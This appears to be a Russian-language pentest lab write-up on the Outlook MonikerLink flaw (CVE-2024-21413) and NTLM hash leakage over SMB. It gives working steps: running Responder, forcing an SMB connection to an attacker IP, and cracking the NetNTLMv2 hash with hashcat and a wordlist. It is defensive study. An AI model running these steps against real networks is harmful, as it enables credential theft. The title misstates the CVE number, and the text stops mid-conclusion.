
Лаборатория, созданная для PenTest уязвимости CVE 2024-214113(MONIKER LINK).
Этот проект был направлен на изучение уязвимости CVE-2024-21413 (MonikerLink), исследуя, как протокол SMB/NTLM может быть использован для перехвата учетных данных.
Даже после официального исправления Microsoft лабораторная работа показывает, что концепция остается актуальной во внутренних сценариях.
Уязвимость (CVE-2024-21413), известная как MonikerLink, была классифицирована как критическая (CVSS 9.8). Это происходит потому, что Outlook небезопасно обрабатывал ссылки "file://", используя старые COM-API (объекты Moniker). Эти объекты позволяли Outlook вызывать внешние ресурсы, минуя Protected View, побуждая клиента автоматически инициировать SMB-соединения.
Это функция Windows, позволяющая ссылаться на COM-объекты через специальные ссылки.
Оригинальный эксплойт злоупотреблял ссылками "file://" или UNC-путями, отправленными по электронной почте.
Добавляя символ "!" в ссылку, можно было обойти внутренние защиты Outlook, принудительно открывая внешний ресурс напрямую.
Это приводило к автоматической аутентификации NTLM, раскрывая хэши NetNTLMv2 атакующему без значительного взаимодействия с пользователем.
Патч KB5002519 специально блокирует такое поведение в Outlook, предотвращая обработку ссылок "file://" таким образом.
Однако автоматический NTLM в Windows продолжает работать вне контекста Outlook, то есть любая попытка доступа к SMB-ресурсам в среде, где NTLM включен и нет ограничений аутентификации, все еще может привести к автоматической отправке хэшей.
📌 Связь между Outlook, SMB/NTLM и Responder Оригинальный эксплойт: через спам-письмо с вредоносной ссылкой → Outlook обрабатывал → NTLM аутентифицировал автоматически → атакующий получал хэш.
Внутренняя лаборатория: мы смоделировали только концептуальную часть → принудительно установили SMB-соединение → Responder захватил хэш → Hashcat выполнил взлом.
Почему это все еще работает? Потому что NTLM — это устаревший протокол, который автоматически аутентифицируется при SMB-соединениях, независимо от Outlook. Патч исправляет клиент Outlook, но не устраняет поведение NTLM в Windows


Во время тестов Outlook блокировал ссылки file://, приходящие по электронной почте, отображая предупреждение безопасности:

Патч KB5002519, выпущенный в феврале 2024 года, смягчает внешний вектор через электронную почту, блокируя ссылки file://.
Однако протокол NTLM по-прежнему позволяет автоматическую аутентификацию при SMB-соединениях.
Это означает, что хотя Outlook защищен от данного конкретного эксплойта, внутренняя поверхность атаки остается актуальной.
Корень проблемы заключается в зависимости от NTLM как механизма аутентификации, который по-прежнему подвержен захвату хэшей при SMB-соединениях.
sudo responder -I eth0

Через Проводник, вручную перейдя по адресу:
\\<IP do atacante>\test.

Через терминал (cmd или PowerShell), используя команду:
net use \\<IP do atacante>\test

/usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

hashcat -m 5600 -a 0 ~/hash.txt /usr/share/wordlists/rockyou.txt
Примечание:
Реальный пароль не отображается по соображениям безопасности. Цель — продемонстрировать процесс и уязвимость.

Эта лабораторная работа показала, что: